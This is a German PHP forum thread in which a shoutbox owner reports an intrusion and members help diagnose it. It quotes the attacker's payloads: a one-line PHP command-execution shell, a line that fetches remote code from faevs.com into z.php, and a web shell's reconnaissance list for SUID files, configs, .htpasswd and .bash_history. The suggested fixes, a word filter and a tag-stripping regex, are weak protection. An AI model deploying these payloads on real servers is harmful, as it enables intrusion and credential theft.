php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > Webmaster > Webmaster
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


Webmaster Fragen rund um die Homepage. Hier könnt ihr eure Tips und Anregungen an andere Webmaster und Homepagebetreiber weitergeben.

Antwort
 
LinkBack Themen-Optionen Thema bewerten
  #1 (permalink)  
Alt 11-03-2008, 20:39
badray
 Registrierter Benutzer
Links : Onlinestatus : badray ist offline
Registriert seit: Nov 2007
Beiträge: 12
badray ist zur Zeit noch ein unbeschriebenes Blatt
Standard Einbruch zwecklos ?

Hallo,

hatte heute in unserer Shoutbox 2 seltsame Einträge von einem Gast.

1.
Code:
<?php system($_GET["cmd"]); ?>
2.
Code:
<?php $z=fopen("z.php",'w');fwrite($z,file_get_contents("http://faevs.com/z.txt"));fclose($z); ?>
Erst dachte ich mir, daß es sich um einen Spinner handelt, habe dann aber vorsichtshalber auf unserem Webspace nachgeschaut ob etwas auffällig ist.

In dem Webordner, wo unsere PHP-Shoutbox drin ist konnte ich ein neues File finden mit dem Name "z.txt"

Der Inhalt der Datei entspricht auch dem Inhalt des Links aus dem zweiten Teil in der Shoutbox.

Ich habe das File sofort gelöscht und stelle mir jetzt die Frage wie es möglich ist, daß jemand auf unserem Webserver so einfach eine Datei anlegen kann.

Muss ich mir Sorgen machen ????

Bin für jede Art von Hilfe dankbar

Viele Grüße Ray
__________________
BADRAY
Mit Zitat antworten
  #2 (permalink)  
Alt 11-03-2008, 20:44
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Wahrscheinlich eval'd deine Shoutbox irgendwo irgendwas.
Mit Zitat antworten
  #3 (permalink)  
Alt 11-03-2008, 20:54
badray
 Registrierter Benutzer
Links : Onlinestatus : badray ist offline
Registriert seit: Nov 2007
Beiträge: 12
badray ist zur Zeit noch ein unbeschriebenes Blatt
Standard aha

Hallo und vielen Dank für die schnelle Antwort.

Allerdings kann ich ehrlich gesagt nicht so viel damit anfangen, bin kein Crack auf dem Gebiet.

Ich mach mir große Sorgen weil in dem Text z.Bsp. auch Sachen drin stehen wie:

Zitat:
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name \"config*\""),
array("find config* files in current dir", "find . -type f -name \"config*\""),
array("find all writable folders and files", "find / -perm -2 -ls"),
array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux second extended file system", "lsattr -va"),
array("show opened ports", "netstat -an | grep -i listen")


Für mich sieht das wie ein Angriff aus, oder ?

Viele Grüße Ray
__________________
BADRAY
Mit Zitat antworten
  #4 (permalink)  
Alt 11-03-2008, 20:57
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Ja, das was der dir da eingeschleust hat ist eine sogenannte PHP-Shell. Eine Datei, mit der man ziemlich gut ausleuchten kann, was auf deiner Kiste so alles möglich ist. Da es aber als txt hochgeladen wurde bin ich etwas stutzig.

Du benutzt wahrscheinlich eine vorgefertigte Shoutbox, oder? Darf ich wissen welche? Oder falls nicht, zeig mal den relevanten Code her (da wo die Eintragsdaten angenommen und verarbeitet werden).
Mit Zitat antworten
  #5 (permalink)  
Alt 11-03-2008, 21:06
badray
 Registrierter Benutzer
Links : Onlinestatus : badray ist offline
Registriert seit: Nov 2007
Beiträge: 12
badray ist zur Zeit noch ein unbeschriebenes Blatt
Standard

wir benutzen die Shoutbox von

http://www.shoutpro.com/

Bislang immer sehr zufrieden und kaum Probleme damit gehabt.

Hilft Dir das weiter oder soll ich den ganzen PHP-Code schicken ?

Wird etwas viel ;-)

Viele Grüße Ray
__________________
BADRAY
Mit Zitat antworten
  #6 (permalink)  
Alt 11-03-2008, 22:41
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Evtl. eine veraltete Version?

Edit: http://milw0rm.org/exploits/3758

Geändert von unset (11-03-2008 um 22:46 Uhr)
Mit Zitat antworten
  #7 (permalink)  
Alt 12-03-2008, 09:02
badray
 Registrierter Benutzer
Links : Onlinestatus : badray ist offline
Registriert seit: Nov 2007
Beiträge: 12
badray ist zur Zeit noch ein unbeschriebenes Blatt
Standard hmm ?

Also die Version wurde leider nicht mehr weiterentwickelt seit der Version 1.52
Dies liegt aber vor der Zeit als die Sicherheitslücke aufgedeckt wurde ;-(

Der Anbieter hat auch schon seit längerer Zeit sein Forum "offline"

Für mich ist jetzt in erster Linie wichtig ob irgendwelche Daten in die Hände des Angreifers gelangen konnten oder ob es ihm möglich war schädliche Codes auf dem Webspace auszuführen. Spammail, etc.

Gibt es für mich eine Möglichkeit außer die Kontrolle der Files auf dem Webspace dies nachzuvollziehen ?

Habe alles sehr genau angeschaut und kann bislang nichts außergewöhnliches feststellen.

Gruß Ray
__________________
BADRAY
Mit Zitat antworten
  #8 (permalink)  
Alt 12-03-2008, 10:16
jahlives
 Master
Links : Onlinestatus : jahlives ist offline
Registriert seit: Jun 2004
Ort: Hooker in Kernel
Beiträge: 8.279
jahlives ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Also deine Shoutbox scheint wirklich Usereingaben direkt an eval() weiterzureichen. Damit wird es möglich, dass ein Textstring als PHP interpretiert und ausgeführt wird. Eingeleitet wurde der Angriff über ein externes File z.txt von faevs.com. Falls du URL Wrapper deaktiviert hättest dann wäre es nicht möglich gewesen das externe File via file_get_contents() einzulesen. Ich würde dir mal empfehlen die Quellcodes aller Files deiner Shoutbox nach eval zu durchsuchen. Prüfe dann welche Daten an diese Funktion durchgereicht werden und wie diese entschärft werden. Ggf würde es bereits ausreichen ein htmlentities() auf die Usereingaben zu machen, das würde dann nämlich die PHP-Tags ungültig machen und eval() müsste sich mit einer Fehlermeldung verabschieden.
Desweiteren mal den Provider von faevs.com anschreiben ggf auch den Domaininhaber und mitteilen, dass auf seinem Webspace Code liegt, der zu Angriffen oder Angriffsversuchen missbraucht wurde.
Prüfe auch unbedingt die Berechtigungen in deinem Webspace auf irgendwelche Auffälligkeiten. Ändere am besten alle Zugangsdaten (Webspace und MySql DB) in Zusammenarbeit mit deinem Provider. Prüfe deinen Webspace auf allfällige Benutzer, die dir unbekannt sind.

Hier noch die Daten zur Domain http://www.whois.net/whois_new.cgi?d=faevs&tld=com

Gruss

tobi
__________________
Gutes Tutorial | PHP Manual | MySql Manual | PHP FAQ | Apache | Suchfunktion für eigene Seiten

"An error does not become truth by reason of multiplied propagation, nor does truth become error because nobody sees it."
Mohandas Karamchand Gandhi (Mahatma Gandhi) (Source)
Mit Zitat antworten
  #9 (permalink)  
Alt 12-03-2008, 10:41
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Die Quelldomain wurde höchstwahrscheinlich selbst gekapert.
Mit Zitat antworten
  #10 (permalink)  
Alt 12-03-2008, 10:47
jahlives
 Master
Links : Onlinestatus : jahlives ist offline
Registriert seit: Jun 2004
Ort: Hooker in Kernel
Beiträge: 8.279
jahlives ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Zitat:
Die Quelldomain wurde höchstwahrscheinlich selbst gekapert.
Ein Grund mehr den Inhaber resp dessen Provider zu informieren
__________________
Gutes Tutorial | PHP Manual | MySql Manual | PHP FAQ | Apache | Suchfunktion für eigene Seiten

"An error does not become truth by reason of multiplied propagation, nor does truth become error because nobody sees it."
Mohandas Karamchand Gandhi (Mahatma Gandhi) (Source)
Mit Zitat antworten
  #11 (permalink)  
Alt 12-03-2008, 12:53
badray
 Registrierter Benutzer
Links : Onlinestatus : badray ist offline
Registriert seit: Nov 2007
Beiträge: 12
badray ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Hallöchen,

Zitat:
Ich würde dir mal empfehlen die Quellcodes aller Files deiner Shoutbox nach eval zu durchsuchen.
Habe ich gemacht, es gibt nirgends einen Eintrag mit "eval"
Sollte dann kein Problem sein, oder ?

Habe mir nun auf einem zugegeben seltsamen Weg geholfen indem ich die bösen Worte sofort nach Eingabe solcher in unsinnige Eingaben wandle, siehe :

php|^|p****|^|
system|^|s****|^|
GET|^|G****|^|
fopen|^|fo***|^|
fwrite|^|fr***|^|
get|^|g****|^|
contents|^|co***|^|

Aus
<?php system($_GET["cmd"]); ?>
wird dann
<?p**** s****($_G****["cmd"]); ?>

und aus
<?php $z=fopen("z.php",'w');fwrite($z,file_get_contents("http://f******m/z.txt"));fclose($z); ?>
wird dann
<?p**** $z=fo***("z.p****",'w');fr***($z,file_G****_co***("http://f******m/z.txt"));fclose($z); ?>

Ist zwar keine tolle Lösung aber ein Test verlief erfolgreich.

Den Webmaster werde ich anschreiben und ihn auf die Gefahr hinweisen.

Datenbanknutzer und Logins habe ich geändert.

Vielen Dank für Eure Mühe und die guten Tips, welche mich nun etwas schlauer machen ;-)

Gruß Ray
__________________
BADRAY
Mit Zitat antworten
  #12 (permalink)  
Alt 12-03-2008, 12:58
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Lass auch mal einen Virenscanner über den Inhalt deines Web-Dirs laufen. Die meisten erkennen solche PHP-Shells. Nicht, dass unser Script-Kid sich schon woanders eingenistet hat.
Mit Zitat antworten
  #13 (permalink)  
Alt 12-03-2008, 14:08
jahlives
 Master
Links : Onlinestatus : jahlives ist offline
Registriert seit: Jun 2004
Ort: Hooker in Kernel
Beiträge: 8.279
jahlives ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Willst du denn dass man PHP-Code oder auch JS eingeben kann? Falls nein dann
PHP-Code:
<?php
preg_replace
('/<script.*>.*</script>|<\\?php.*\\?>|<\\?.*\\?>|<%.*%>/iUs','',$usereingabe);
Zitat:
Habe mir nun auf einem zugegeben seltsamen Weg geholfen indem ich die bösen Worte sofort nach Eingabe solcher in unsinnige Eingaben wandle, siehe :
Heisst das du lässt pro Muster einen RegExp drüber? Das würde ich mal mutig als Ressourcenverschwendung bezeichnen...

Gruss

tobi
__________________
Gutes Tutorial | PHP Manual | MySql Manual | PHP FAQ | Apache | Suchfunktion für eigene Seiten

"An error does not become truth by reason of multiplied propagation, nor does truth become error because nobody sees it."
Mohandas Karamchand Gandhi (Mahatma Gandhi) (Source)

Geändert von jahlives (12-03-2008 um 14:11 Uhr)
Mit Zitat antworten
  #14 (permalink)  
Alt 12-03-2008, 19:37
badray
 Registrierter Benutzer
Links : Onlinestatus : badray ist offline
Registriert seit: Nov 2007
Beiträge: 12
badray ist zur Zeit noch ein unbeschriebenes Blatt
Standard oje

also eigentlich handelt es sich um einen Wortfilter, dieser setzt das Geschriebene um, sonst nix.......

PHP-Code:
<?php
preg_replace
('/<script.*>.*</script>|<\\?php.*\\?>|<\\?.*\\?>|<%.*%>/iUs','',$usereingabe);
verstehe ich nicht wirklich, kannst Du mir etwas auf die Sprünge helfen ?

Vielen Dank und viele Grüße


Ray
__________________
BADRAY
Mit Zitat antworten
  #15 (permalink)  
Alt 13-03-2008, 09:34
badray
 Registrierter Benutzer
Links : Onlinestatus : badray ist offline
Registriert seit: Nov 2007
Beiträge: 12
badray ist zur Zeit noch ein unbeschriebenes Blatt
Standard oh oh

Hallöchen,

hatte gerade einen netten Anruf aus der Schweiz ................

Am anderen Ende war unser Provider vom Webspace, der mir erklärte, daß unsere Shoutbox in den letzten 2 Tagen ca. 25 GB an Traffic verbraucht hat und für Spammails missbraucht wurde.

Ich habe mich mit dem echt netten Supportmenschen darauf einigen können, daß ich die Shoutbox mit sofortiger Wirkung vom Netz nehme und mich um eine Alternative kümmere.
Mit weiteren Konsequenzen hätte ich dann nicht mehr zu rechnen.

Das ist eine sehr feine Geste von unserem Provider, ich bin begeistert !!!

Ich werde eine dann wohl eine fremd gehostete Shoutbox einbauen, dann liegt das Risiko nicht mehr auf unserer Seite

Viele Grüße Ray
__________________
BADRAY
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni

Wissensbestand in Unternehmen
Wissensbestand in UnternehmenLebenslanges Lernen und Weiterbilden sichert Wissensbestand in Unternehmen

25.05.2018 | Berni


 

Aktuelle PHP Scripte

PHP Server Monitor

PHP Server Monitor ist ein Skript, das prüft, ob Ihre Websites und Server betriebsbereit sind.

11.09.2018 Berni | Kategorie: PHP/ Security
PHP WEB STATISTIK ansehen PHP WEB STATISTIK

Die PHP Web Statistik bietet Ihnen ein einfach zu konfigurierendes Script zur Aufzeichnung und grafischen und textuellen Auswertung der Besuchern Ihrer Webseite. Folgende zeitlichen Module sind verfügbar: Jahr, Monat, Tag, Wochentag, Stunde Folgende son

28.08.2018 phpwebstat | Kategorie: PHP/ Counter
Affilinator - Affilinet XML Produktlisten Skript

Die Affilinator Affilinet XML Edition ist ein vollautomatisches Skript zum einlesen und darstellen der Affili.net (Partnerprogramm Netzwerk) Produktlisten und Produktdaten. Im Grunde gibt der Webmaster seine Affilinet PartnerID ein und hat dann unmittelb

27.08.2018 freefrank@ | Kategorie: PHP/ Partnerprogramme
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 21:46 Uhr.